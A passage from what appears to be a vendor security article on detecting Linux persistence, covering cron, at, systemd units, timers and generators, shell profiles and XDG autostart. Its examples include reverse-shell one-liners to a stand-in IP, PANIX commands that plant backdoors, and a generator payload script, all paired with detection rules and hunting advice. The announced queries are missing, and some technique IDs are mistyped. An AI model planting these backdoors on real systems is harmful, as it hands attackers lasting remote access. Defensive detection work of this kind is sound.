+To support this effort, Elastic utilizes the MITRE ATT&CK framework as the primary lexicon for categorizing techniques in most of our detection artifacts. [MITRE ATT&CK](https://attack.mitre.org/matrices/enterprise/) is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. It is commonly used as a foundation for developing specific threat models and methodologies within the field of cybersecurity. By leveraging this comprehensive framework, we enhance our ability to detect, understand, and mitigate persistent threats effectively.
+
+## Setup
+
+To ensure you are prepared to detect the persistence mechanisms discussed in this article, [enabling and updating our pre-built detection rules is important](https://www.elastic.co/guide/en/security/current/prebuilt-rules-management.html#update-prebuilt-rules). If you are working with a custom-built ruleset and do not use all of our pre-built rules, this is a great opportunity to test them and fill in any gaps.
+
+To install, enable, and update our pre-built rules, follow these steps:
+
+1. Navigate to Kibana → Security → Rules → Detection rules (SIEM).
+2. You will find your installed and potential new and/or updated pre-built rules here.
+3. Use the "Add Elastic rules" button to add the latest Elastic pre-built rules.
+4. Use the "Rule Updates" tab to update existing rules.
+
+Now, we are ready to get started. 
+
+## T1053 - scheduled task/job
+
+Automating routine tasks is common in Unix-like operating systems for system maintenance. Some common utilities used for task scheduling are [cron](https://www.man7.org/linux/man-pages/man8/cron.8.html) and [at](https://man7.org/linux/man-pages/man1/at.1p.html). MITRE details information related to this technique under the identifier [T1053](https://attack.mitre.org/techniques/T1053/). 
+
+### T1053.003 - scheduled task/job: Cron
+
+[Cron](https://www.man7.org/linux/man-pages/man8/cron.8.html) is a utility for scheduling recurring tasks to run at specific times or intervals. It is available by default on most Linux distributions. It is a [daemon](https://man7.org/linux/man-pages/man7/daemon.7.html) (that is, a background process that typically performs tasks without requiring user interaction) that reads cron files from a default set of locations. These files contain commands to run periodically and/or at a scheduled time.
+
+The scheduled task is called a cron job and can be executed with both user and root permissions, depending on the configuration. Due to its versatility, cron is an easy and stable candidate for Linux persistence, even without escalating to root privileges upon initial access. 
+
+There are user-specific and system-wide cron jobs. The user-specific cron jobs commonly reside in:
+
+* `/var/spool/cron/`
+* `/var/spool/cron/crontabs/`
+
+The system-wide cron jobs are located in the following:
+
+* `/etc/crontab`
+* `/etc/cron.d/`
+* `/etc/cron.daily/`
+* `/etc/cron.hourly/`
+* `/etc/cron.monthly/`
+* `/etc/cron.weekly/`
+
+The cron file syntax slightly differs based on the location in which the cron file is created. For the cron files in the `/etc/` directory, the user who will execute the job must be specified.
+
+```
+* * * * * root /bin/bash -c '/srv/backup_tool.sh'
+```
+
+Conversely, the user who created the cron files in the `/var/spool/cron/crontabs/` directory will execute the cron files.
+
+```
+* * * * * /bin/bash -c '/srv/backup_tool.sh'
+```
+
+The asterisks are used to create the schedule. They represent (in order) minutes, hours, days (of the month), months, and days (of the week). Setting “`* * * * *`” means the cron job is executed every minute while setting “`* * 1 12 *`”` `means the cron job is executed every minute on the first day of December. Information on cron scheduling is available at [Crontab Guru](https://crontab.guru/).
+
+Attackers can exploit these jobs to run scripts or binaries that establish reverse connections or add reverse shell commands.
+
+```
+* * * * * root /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'
+```
+
+MITRE specifies more information and real-world examples related to this technique in [T1053.003](https://attack.mitre.org/techniques/T1053/003/).
+
+#### Persistence through T1053.003 - cron
+
+You can manually create a system-wide cron file in any of the `/etc/` directories or use the `crontab -e` command to create a user-specific cron file. To more easily illustrate all of the persistence mechanisms presented in these articles, we will use PANIX. Depending on the privileges when running it, you can establish persistence like so:
+
+```
+sudo ./panix.sh --cron --default --ip 192.168.1.1 --port 2001
+[+] Cron job persistence established.
+```
+
+The default setting for the root user will create a cron file at `/etc/cron.d/freedesktop_timesync1` that calls out to the attacker system every minute. When looking at the events, we can see the following:
+
+![Events generated as a result of cron persistence establishment](/assets/images/primer-on-persistence-mechanisms/image11.png "Events generated as a result of cron persistence establishment")
+
+When PANIX was executed, the cron job was created, `/usr/sbin/cron` read the contents of the cron file and executed it, after which a network connection was established. Analyzing this chain of events, we can identify several detection capabilities for this and other proof-of-concepts.
+
+Elastic SIEM includes over 1,000 prebuilt rules and more than 200 specifically dedicated to Linux. These rules run on the Elastic cluster and are designed to detect threat techniques that are available in our public [detection rules repository](https://github.com/elastic/detection-rules/tree/main). Our prevention capabilities include behavioral endpoint rules and memory/file signatures, which are utilized by Elastic Defend and can be found in our public [protection artifacts repository](https://github.com/elastic/protections-artifacts). 
+
+| Category | Coverage                                           |
+|----------|----------------------------------------------------|
+| File     | [Cron Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_cron_job_creation.toml)                       |
+|          | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml)   |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)        |
+| Process  | [Hidden Payload Executed via Scheduled Job](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_hidden_payload_executed_via_scheduled_job.toml)          |
+|          | [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml) |
+|          | [Scheduled Task Unusual Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_task_unusual_command_execution.toml)           |
+
+The file category has three different rules, the first two focusing on creation/modification using Elastic Defend, while the third focuses on modification through [File Integrity Monitoring (FIM)](https://www.elastic.co/docs/current/integrations/fim). FIM can be set up using [Auditbeat](https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-module-file_integrity.html) or via the Fleet integration. To correctly set up FIM, it is important to specify full paths to the files that FIM should monitor, as it does _not_ allow for wildcards. Therefore, Potential Persistence via File Modification is a rule that requires manual setup and tailoring to your specific needs, as it will require individual entries depending on the persistence technique you are trying to detect.
+
+### T1053.002 - scheduled task/job: at
+
+[At](https://man7.org/linux/man-pages/man1/at.1p.html) is a utility for scheduling one-time tasks to run at a specified time in the future on Linux systems. Unlike cron, which handles recurring tasks, At is designed for single executions. The At daemon (`atd`) manages and executes these scheduled tasks at the specified time.
+
+An At job is defined by specifying the exact time it should run. Depending on the configuration, users can schedule At jobs with either user or root permissions. This makes At a straightforward option for scheduling tasks without the need for persistent or repeated execution, but less useful for attackers. Additionally, At is not present on most Linux distributions by-default, which makes leveraging it even less trivial. However, it is still used for persistence, so we should not neglect the technique.
+
+At jobs are stored in `/var/spool/cron/atjobs/`. Besides the At job, At also creates a spool file in the `/var/spool/cron/atspool/` directory. These job files contain the details of the scheduled tasks, including the commands to be executed and the scheduled times. 
+
+To schedule a task using At, you simply provide the command to run and the time for execution. The syntax is straightforward:
+
+```
+echo "/bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'" | at now + 1 minute
+```
+
+The above example schedules a task to run one minute from the current time. The time format can be flexible, such as `at 5 PM tomorrow` or `at now + 2 hours`. At job details can be listed using the `atq` command, and specific jobs can be removed using `atrm`.
+
+At is useful for one-time task scheduling and complements cron for users needing recurring and single-instance task scheduling solutions. MITRE specifies more information and real-world examples related to this technique in [T1053.002](https://attack.mitre.org/techniques/T1053/002/).
+
+#### Persistence through T1053.002 - At
+
+You can leverage the above command structure or use PANIX to set up an At job. Ensure At is installed on your system and the time settings are correct, as this might interfere with the execution. 
+
+```
+./panix.sh --at --default --ip 192.168.1.1 --port 2002 --time 14:49
+job 15 at Tue Jun 11 14:49:00 2024
+[+] At job persistence established.
+```
+
+By default, depending on the privileges used to run the program, a reverse connection will be established at the time interval the user specified. Looking at the events in Discover:
+
+![Events generated as a result of At persistence establishment](/assets/images/primer-on-persistence-mechanisms/image2.png "Events generated as a result of At persistence establishment")
+
+We see the execution of PANIX, which is creating the At job. Next, At(d) creates two files, an At job and an At spool. At the correct time interval, the At job is executed, after which the reverse connection to the attack IP is established. Looking at these events, we have fewer behavioral coverage opportunities than we have for cron, as behaviorally, it is just `/bin/sh` executing a shell command. However, we can still identify the following artifacts:
+
+| Category | Coverage                                    |
+|----------|---------------------------------------------|
+| File     | [At Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_at_job_creation.toml)                  |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml) |
+
+### T1053 - scheduled task/job: honorable mentions
+
+Several other honorable mentions for establishing persistence through scheduled tasks/jobs include [Anacron](https://www.man7.org/linux/man-pages/man8/anacron.8.html), [Fcron](https://man.archlinux.org/man/fcron.8.en), [Task Spooler](https://manpages.ubuntu.com/manpages/xenial/man1/tsp.1.html), and [Batch](https://man7.org/linux/man-pages/man1/batch.1p.html). While these tools are less commonly leveraged by malware due to their non-default installation and limited versatility compared to cron and other mechanisms, they are still worth noting. We include behavioral detection rules for some of these in our persistence rule set. For example, Batch jobs are saved in the same location as At jobs and are covered by our "[At Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_at_job_creation.toml)" rule. Similarly, Anacron jobs are covered through our "[Cron Job Created or Modified](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_cron_job_creation.toml)" rule, as Anacron integrates with the default Cron persistence detection setup.
+
+### Hunting for T1053 - scheduled task/job 
+
+Besides relying on Elastic’s pre-built [detection](https://github.com/elastic/detection-rules) and [endpoint rules](https://github.com/elastic/protections-artifacts), a defender will greatly benefit from manual threat hunting. As part of Elastic’s 8.14 release, the general availability of the [Elasticsearch Query Language (ES|QL) language](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) was introduced. ES|QL provides a powerful way to filter, transform, and analyze data stored in Elasticsearch. For this use case, we will leverage ES|QL to hunt through all the data in an Elasticsearch stack for traces of cron, At, Anacron, Fcron, Task Spooler,` `and Batch persistence. 
+
+We can leverage the following ES|QL query that can be tailored to your specific environment:
+
+This query returns 76 hits that could be investigated. Some are related to PANIX, others to real malware detonations, and some are false positives. 
+
+![Results of the ES|QL hunt for scheduled task persistence establishment](/assets/images/primer-on-persistence-mechanisms/image5.png "Results of the ES|QL hunt for scheduled task persistence establishment")
+
+Dealing with false positives is crucial, as system administrators and other authorized personnel commonly use these tools. Differentiating between legitimate and malicious use is essential for maintaining an effective security posture. Accurately identifying the intent behind using these tools helps minimize disruptions caused by false alarms while ensuring that potential threats are addressed promptly.
+
+Programs similar to cron also have an execution history, as all of the scripts it executes will have cron as its parent. This allows us to hunt for unusual process executions through ES|QL:
+
+This example performs aggregation using a `distinct_count` of `host.id`. If an anomalous entry is observed, `host_count` can be removed, and additional fields such as `host.name` and `user.name` can be added to the by section. This can help find anomalous behavior on specific hosts rather than across the entire environment. This could also be an additional pivoting opportunity if suspicious processes are identified. 
+
+In this case, the query returns 37 results, most of which are true positives due to the nature of the testing stack in which this is executed. 
+
+![Results of the ES|QL hunt for scheduled task execution persistence establishment](/assets/images/primer-on-persistence-mechanisms/image3.png "Results of the ES|QL hunt for scheduled task execution persistence establishment")
+
+In your environment, this will likely return a massive amount of results. You may consider reducing/increasing the number of days that are being searched. Additionally, the total count of entries (cc) and host_count can be increased/decreased to make sense for your environment. Every network is unique; therefore, a false positive in one environment may not be a false positive for every environment. Additionally, the total count of entries (`cc`) and `host_count` can be increased/decreased to make sense for your environment. Every network is unique, and therefore a false-positive in one environment may not be a false-positive in another. Adding exclusions specific to your needs will allow for easier hunting.
+
+Besides ES|QL, we can also leverage Elastic’s [OSQuery Manager integration](https://www.elastic.co/docs/current/integrations/osquery_manager). OSQuery is an open-source, cross-platform tool that uses SQL queries to investigate and monitor the operating system's performance, configuration, and security by exposing system information as a relational database. It allows administrators and security professionals to easily query system data and create real-time monitoring and analytics solutions. Streaming telemetry represents activity over time, while OSQuery focuses on static on-disk presence. This opens the door for detecting low-and-slow/decoupled-style attacks and might catch otherwise missed activity through telemetry hunting. 
+
+Information on how to set up OSQuery can be found in the [Kibana docs](https://www.elastic.co/guide/en/kibana/current/osquery.html), and a blog post explaining OSQuery in depth can be found [here](https://www.elastic.co/blog/gain-upper-hand-over-adversaries-with-osquery-and-elastic). We can run the following live query to display all of the cron files present on a particular system:
+
+The following results are returned. We can see the `/etc/cron.d/freedesktop_timesync1` with a `file_last_status_change_time` that is recent and differs from the rest of the cron files. This is the backdoor planted by PANIX. 
+
+![Results of the OSQuery hunt for scheduled task persistence establishment](/assets/images/primer-on-persistence-mechanisms/image4.png "Results of the OSQuery hunt for scheduled task persistence establishment")
+
+If we want to dig deeper, OSQuery also provides a module to read the commands from the crontab file by running the following query:
+
+This shows us the command, the location of the cron job, and the corresponding schedule at which it runs. 
+
+![Results of the OSQuery crontab hunt](/assets/images/primer-on-persistence-mechanisms/image1.png "Results of the OSQuery crontab hunt")
+
+Analyzing the screenshot, we see two suspicious reverse shell entries, which could require additional manual investigation. 
+
+An overview of the hunts outlined above, with additional descriptions and references, can be found in our [detection rules repository](https://github.com/elastic/detection-rules), specifically in the [Linux hunting subdirectory](https://github.com/elastic/detection-rules/tree/main/hunting). We can hunt for uncommon scheduled task file creations or unusual process executions through scheduled task executables by leveraging ES|QL and OSQuery. The [Persistence via Cron](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_cron.toml) hunt contains several ES|QL and OSQuery queries to aid this process.
+
+## T1453 - create or modify system process (systemd)
+
+[Systemd](https://man7.org/linux/man-pages/man1/init.1.html) is a system and service manager for Linux, widely adopted as a replacement for the traditional [SysVinit](https://manpages.debian.org/testing/sysvinit-core/init.8.en.html) system. It is responsible for initializing the system, managing processes, and handling system resources. Systemd operates through a series of unit files defining how services should be started, stopped, and managed.
+
+[Unit files](https://manpages.debian.org/jessie/systemd/systemd.unit.5.en.html) have different types, each designed for specific purposes. The Service unit is the most common unit type for managing long-running processes (typically daemons). Additionally, the Timer unit manages time-based activation of other units, similar to cron jobs, but integrated into Systemd. 
+
+This section will discuss [T1453](https://attack.mitre.org/techniques/T1543/) for systemd services and generators, and [T1053](https://attack.mitre.org/techniques/T1053/) for systemd timers.
+
+### T1453.002 - create or modify system process: systemd services
+
+The [services](https://www.digitalocean.com/community/tutorials/understanding-systemd-units-and-unit-files) managed by systemd are defined by unit files, and are located in default directories, depending on the operating system and whether the service is run system-wide or user-specific. The system-wide unit files are typically located in the following directories:
+
+* `/run/systemd/system/`
+* `/etc/systemd/system/`
+* `/etc/systemd/user/`
+* `/usr/local/lib/systemd/system/`
+* `/lib/systemd/system/`
+* `/usr/lib/systemd/system/`
+* `/usr/lib/systemd/user/`
+
+User-specific unit files are typically located at:
+
+* `~/.config/systemd/user/`
+* `~/.local/share/systemd/user/`
+
+A basic service unit file consists of three main sections: `[Unit]`, `[Service]`, and `[Install]`, and has the `.service` extension. Here's an example of a simple unit file that could be leveraged for persistence:
+
+```
+[Unit]
+Description=Reverse Shell
+
+[Service]
+ExecStart=/bin/bash -c 'sh -i >& /dev/tcp/192.168.1.1/1337 0>&1'
+
+[Install]
+WantedBy=multi-user.target
+```
+
+This unit file would attempt to establish a reverse shell connection every time the system boots, running with root privileges. More information and real-world examples related to systemd services are outlined by MITRE in [T1543.002](https://attack.mitre.org/techniques/T1543/002/).
+
+Relying solely on persistence upon reboot might be too restrictive. Timer unit files can be leveraged to overcome this limitation to ensure persistence on a predefined schedule.
+
+### T1053.006 - scheduled task/job: systemd timers
+
+[Timer units](https://wiki.archlinux.org/title/systemd/Timers) provide a versatile method to schedule tasks, similar to cron jobs but more integrated with the Systemd ecosystem. A timer unit specifies the schedule and is associated with a corresponding service unit that performs the task. Timer units can run tasks at specific intervals, on specific dates, or even based on system events.
+
+Timer unit files are typically located in the same directories as the service unit files and have a `.timer` extension. Coupling timers to services is done by leveraging the same unit file name but changing the extension. An example of a timer unit file that would activate our previously created service every hour can look like this:
+
+```
+[Unit]
+Description=Obviously not malicious at all
+
+[Timer]
+OnBootSec=1min
+OnUnitActiveSec=1h
+
+[Install]
+WantedBy=timers.target
+```
+
+Timers are versatile and allow for different scheduling options. Some examples are `OnCalendar=Mon,Wed,Fri 17:00:00` to run a service every Monday, Wednesday, and Friday at 5:00 PM, and `OnCalendar=*-*-* 02:30:00` to run a service every day at 2:30 AM. More details and real world examples related to Systemd timers are presented by MITRE in [T1053.006](https://attack.mitre.org/techniques/T1053/006/).
+
+### T1453 - create or modify system process: systemd generators
+
+[Generators](https://manpages.debian.org/testing/systemd/systemd.generator.7.en.html) are small executables executed by systemd at bootup and during configuration reloads. Their main role is to convert non-native configuration and execution parameters into dynamically generated unit files, symlinks, or drop-ins, extending the unit file hierarchy for the service manager.
+
+System and user generators are loaded from the `system-generators`/ and `user-generators`/ directories, respectively, with those listed earlier overriding others of the same name. Generators produce output in three priority-based directories: `generator.early` (highest), `generator` (medium), and `generator.late` (lowest). Reloading daemons will re-run all generators and reload all units from disk.
+
+System-wide generators can be placed in the following directories:
+
+* `/run/systemd/system-generators/`
+* `/etc/systemd/system-generators/`
+* `/usr/local/lib/systemd/system-generators/`
+* `/lib/systemd/system-generators/`
+* `/usr/lib/systemd/system-generators/`
+
+User-specific generators are placed in the following directories:
+
+* `/run/systemd/user-generators/`
+* `/etc/systemd/user-generators/`
+* `/usr/local/lib/systemd/user-generators/`
+* `/lib/systemd/user-generators/`
+* `/usr/lib/systemd/user-generators/`
+
+[Pepe Berba's research](https://pberba.github.io/security/2022/02/07/linux-threat-hunting-for-persistence-systemd-generators/) explores using systemd generators to establish persistence. One method involves using a generator to create a service file that triggers a backdoor on boot. Alternatively, the generator can execute the backdoor directly, which can cause delays if the network service is not yet started, alerting the user. Systemd generators can be binaries or shell scripts. For example, a payload could look like this:
+
+```
+#!/bin/sh
+# Create a systemd service unit file in the late directory
+cat <<-EOL > "/run/systemd/system/generator.service"
+[Unit]
+Description=Generator Service
+
+[Service]
+ExecStart=/usr/lib/systemd/system-generators/makecon
+Restart=always
+RestartSec=10
+
+[Install]
+WantedBy=multi-user.target
+EOL
+
+mkdir -p /run/systemd/system/multi-user.target.wants/
+ln -s /run/systemd/system/generator.service /run/systemd/system/multi-user.target.wants/generator.service
+
+# Ensure the script exits successfully
+exit 0
+```
+
+Which creates a new service (`generator.service`), which in turn executes `/usr/lib/systemd/system-generators/makecon` on boot. As this method creates a service (albeit via a generator), we will take a closer look at systemd service persistence. Let's examine how these work in practice.
+
+### Persistence through T1453/T1053 - systemd services, timers and generators
+
+You can manually create the unit file in the appropriate directory, reload the daemon, enable and start the service, or use PANIX to do that for you. PANIX will create a service unit file in the specified directory, which in turn runs the custom command at a one-minute interval through a timer unit file. You can also use `--default` with` --ip`, `--port,` and `–-timer`.
+
+```
+sudo ./panix.sh --systemd --custom --path /etc/systemd/system/panix.service --command "/usr/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.1/2003 0>&1'" --timer
+Service file created successfully!
+Created symlink /etc/systemd/system/default.target.wants/panix.service → /etc/systemd/system/panix.service.
+Timer file created successfully!
+Created symlink /etc/systemd/system/timers.target.wants/panix.timer → /etc/systemd/system/panix.timer.
+[+] Persistence established. 
+```
+
+When a service unit is enabled, systemd creates a symlink in the `default.target.wants/` directory (or another appropriate target directory). This tells systemd to start the `panix.service` automatically when the system reaches the `default.target`. Similarly, the symlink for the timer unit file tells systemd to activate the timer based on the schedule defined in the timer unit file.
+
+We can analyze and find out what happened when looking at the documents in Kibana: 
+
+![Events generated as a result of systemd service/timer persistence establishment](/assets/images/primer-on-persistence-mechanisms/image9.png "Events generated as a result of systemd service/timer persistence establishment")
+
+PANIX is executed, which creates the `panix.service` and `panix.timer` units in the corresponding directories. Then, `systemctl` is used to reload the daemons, after which the `panix.timer` is enabled and started, enabling systemd to run the `ExecStart` section of the service unit (which initiates the outbound network connection) every time the timer hits. To detect potential systemd persistence, we leverage the following behavioral rules:
+
+| Category | Coverage                                           |
+|----------|----------------------------------------------------|
+| File     | [Systemd Service Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_service_creation.toml)                            |
+|          | [Systemd Timer Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_scheduled_timer_created.toml)                              |
+|          | [Systemd Generator Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_generator_creation.toml)                          |
+|          | [Suspicious File Creation in /etc for Persistence](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_etc_file_creation.toml)   |
+| Process  | [Systemd Service Started by Unusual Parent Process](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_systemd_service_started.toml)  |
+|          | [Hidden Payload Executed via Scheduled Job](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_hidden_payload_executed_via_scheduled_job.toml)          |
+|          | [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml) |
+|          | [Scheduled Task Unusual Command Execution](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_task_unusual_command_execution.toml)           |
+
+### Hunting for T1053/T1453 - systemd services, timers and generators
+
+We can hunt for uncommon `service`/`timer`/`generator` file creations in our environment through systemd by leveraging ES|QL and OSQuery. The [Persistence via Systemd (Timers)](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_systemd_timers.toml) file contains several ES|QL and OSQuery queries that can help hunt for these types of persistence.
+
+## T1546.004 - event triggered execution: Unix shell configuration modification
+
+[Unix shell configuration files](https://effective-shell.com/part-5-building-your-toolkit/configuring-the-shell/) are scripts that run throughout a user session based on events (e.g., log in/out, or open/close a shell session). These files are used to customize the shell environment, including setting environment variables, aliases, and other session-specific settings. As these files are executed via a shell, they can easily be leveraged by attackers to establish persistence on a system by injecting backdoors into these scripts. 
+
+Different shells have their own configuration files. Similarly to cron and systemd, this persistence mechanism can be established with both user and root privileges. Depending on the shell, system-wide shell configuration files are located in the following locations and require root permissions to be changed:
+
+* `/etc/profile`
+* `/etc/profile.d/`
+* `/etc/bash.bashrc`
+* `/etc/bash.bash_logout`
+
+User-specific shell configuration files are triggered through actions performed by and executed in the user's context. Depending on the shell, these typically include:
+
+* `~/.profile`
+* `~/.bash_profile`
+* `~/.bash_login`
+* `~/.bash_logout`
+* `~/.bashrc`
+
+Once modified, these scripts ensure malicious commands are executed for every user login or logout. These scripts are executed in a [specific order](https://www.thegeekstuff.com/2008/10/execution-sequence-for-bash_profile-bashrc-bash_login-profile-and-bash_logout/). When a user logs in via SSH, the order of execution for the login shells is:
+
+1. `/etc/profile`
+2. `~/.bash_profile` (if it exists, otherwise)
+3. `~/.bash_login` (if it exists, otherwise)
+4. `~/.profile` (if it exists)
+
+For non-login interactive shell initialization, `~/.bashrc` is executed. Typically, to ensure this configuration file is also executed on login, `~/.bashrc` is sourced within `~/.bash_profile`, `~/.bash_login` or `~/.profile`. Additionally, a backdoor can be added to the `~/.bash_logout` configuration file for persistence upon shell termination. 
+
+When planting a backdoor in one of these files, it is important not to make mistakes in the execution chain, meaning that it is both important to pick the correct configuration file and to pick a fitting payload. A typical reverse shell connection will make the terminal freeze while sending the reverse shell connection to the background will make it malfunction. A potential payload could look like this:
+
+```
+(nohup bash -i > /dev/tcp/192.168.1.1/1337 0<&1 2>&1 &)
+```
+
+This command uses “nohup” (no hang up) to run an interactive bash reverse shell as a background process, ensuring it continues running even after the initiating user logs out. The entire command is then executed in the background using `&` and wrapped in parentheses to create a subshell, preventing any interference with the parent shell’s operations.
+
+Be vigilant for other types of backdoors, such as credential stealers that create fake “`[sudo] password for…`” prompts when running sudo or the execution of malicious binaries. MITRE specifies more information and real-world examples related to this technique in [T1546.004](https://attack.mitre.org/techniques/T1546/004/).
+
+### Persistence through T1546.004 - shell profile modification
+
+You can add a bash payload to shell configuration files either manually or using PANIX. When PANIX runs with user privileges, it establishes persistence by modifying `~/.bash_profile`. With root privileges, it modifies the `/etc/profile` file to achieve system-wide persistence.
+
+```
+sudo ./panix.sh --shell-profile --default --ip 192.168.1.1 --port 2004
+```
+
+To trigger it, either log in as root via the shell with `su --login root` or login via SSH. The shell profile will be parsed and executed in order, resulting in the following chain of execution:
+
+![Events generated as a result of shell profile modification persistence establishment](/assets/images/primer-on-persistence-mechanisms/image10.png "Events generated as a result of shell profile modification persistence establishment")
+
+PANIX plants the backdoor in `/etc/profile`, next `su --login root` is executed to trigger the payload, the `UID`/`GID` changes to root, and a network connection is initiated through the injected backdoor. A similar process occurs when logging in via SSH. We can detect several steps of the attack chain. 
+
+Detection and endpoint rules that cover shell profile modification persistence_
+
+| Category | Coverage                                                     |
+|----------|--------------------------------------------------------------|
+| File     | [Shell Configuration Creation or Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_shell_configuration_modification.toml)                 |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)                  |
+| Process  | [Binary Execution from Unusual Location through Shell Profile](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_binary_execution_from_unusual_location_through_shell_profile.toml) |
+| Network  | [Network Connection through Shell Profile](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_network_connection_through_shell_profile.toml)                     |
+
+### Hunting for T1546.004 - shell configuration modification
+
+We can hunt for shell profile file creations/modification, as well as SSHD child processes, by leveraging ES|QL and OSQuery. The [Shell Modification Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_shell_modification_persistence.toml) hunting rule contains several of these hunting queries.
+
+## T1547.013 - boot or logon autostart execution: XDG autostart entries
+
+Cross-Desktop Group (XDG) is a set of[ standards for Unix desktop environments](https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html) that describe how applications should be started automatically when a user logs in. The XDG Autostart specification is particularly interesting, as it defines a way to automatically launch applications based on desktop entry files, which are plain text files with the `.desktop` extension.
+
+The `.desktop` files are typically used to configure how applications appear in menus and how they are launched. By leveraging XDG Autostart, attackers can configure malicious applications to run automatically whenever users log into their desktop environment.
+
+The location where these files can be placed varies based on whether the persistence is being established for all users (system-wide) or a specific user. It also depends on the desktop environment used; for example, KDE has other configuration locations than Gnome. Default system-wide autostart files are located in directories that require root permissions to modify, such as:
+
+* `/etc/xdg/autostart/`
+* `/usr/share/autostart/`
+
+Default user-specific autostart files, other than the root user-specific autostart file, only require user-level permissions. These are typically located in:
+
+* `~/.config/autostart/`
+* `~/.local/share/autostart/`
+* `~/.config/autostart-scripts/ (not part of XDG standard, but used by KDE)`
+* `/root/.config/autostart/*`
+* `/root/.local/share/autostart/`
+* `/root/.config/autostart-scripts/`
+
+An example of a `.desktop` file that executes a binary whenever a user logs in looks like this:
+
+```
+[Desktop Entry]
+Type=Application
+Exec=/path/to/malicious/binary
+Hidden=false
+NoDisplay=false
+X-GNOME-Autostart-enabled=true
+Name=Updater
+```
+
+Volexity recently published research on [DISGOMOJI](https://www.volexity.com/blog/2024/06/13/disgomoji-malware-used-to-target-indian-government/) malware, which was found to establish persistence by dropping a `.desktop` file in the `~/.config/autostart/` directory, which would execute a malicious backdoor planted on the system. As it can be established with both user/root privileges, it is an interesting candidate for automated persistence implementations. Additionally, more information and real-world examples related to this technique are specified by MITRE in [T1547.013](https://attack.mitre.org/techniques/T1547/013/).
+
+### Persistence through T1547.013 - Cross-Desktop Group (XDG)
+
+You can determine coverage and dynamically analyze this technique manually or through PANIX. When analyzing this technique, make sure XDG is available on your testing system, as it is designed to be used on systems with a GUI (XDG can also be used without a GUI). When PANIX runs with user privileges, it establishes persistence by modifying `~/.config/autostart/user-dirs.desktop` to execute `~/.config/autostart/.user-dirs` and achieve user-specific persistence. With root privileges, it modifies `/etc/xdg/autostart/pkc12-register.desktop` to execute `/etc/xdg/pkc12-register` and achieve system-wide persistence.
+
+```
+sudo ./panix.sh --xdg --default --ip 192.168.1.1 --port 2005
+[+] XDG persistence established.
+```
+
+After rebooting the system and collecting the logs, the following events will be present for a GNOME-based system.
+
+![Events generated as a result of XDG persistence establishment](/assets/images/primer-on-persistence-mechanisms/image7.png "Events generated as a result of XDG persistence establishment")
+
+We can see PANIX creating the `/etc/xdg/autostart` directory and the `pkc12-register/pkc12-register.desktop` files. It grants execution privileges to the backdoor script, after which persistence is established. When the user logs in, the `.desktop` files are parsed, and `/usr/libexec/gnome-session-binary` executes its contents, which in turn initiates the reverse shell connection. Here, again, we can detect several parts of the attack chain. 
+
+| Category | Coverage                                                          |
+|----------|-------------------------------------------------------------------|
+| File     | [Persistence via KDE AutoStart Script or Desktop File Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_kde_autostart_modification.toml) |
+|          | [Potential Persistence via File Modification](https://github.com/elastic/detection-rules/blob/main/rules/integrations/fim/persistence_suspicious_file_modifications.toml)                       |
+| Network  | [Network Connections Initiated Through XDG Autostart Entry](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_xdg_autostart_netcon.toml)         |
+
+Again, the file category has two different rules: the former focuses on creation/modification using Elastic Defend, while the latter focuses on modification through FIM.
+
+### Hunting for T1547.013 - XDG autostart entries
+
+Hunting for persistence through XDG involves XDG `.desktop` file creations in known locations and unusual child processes spawned from a session-manager parent through ES|QL and OSQuery. The [XDG Persistence](https://github.com/elastic/detection-rules/blob/main/hunting/linux/queries/persistence_via_xdg_autostart_modifications.toml) hunting rule contains several queries to hunt for XDG persistence.
+
+## T1548.001 - abuse elevation control mechanism: setuid and setgid
+
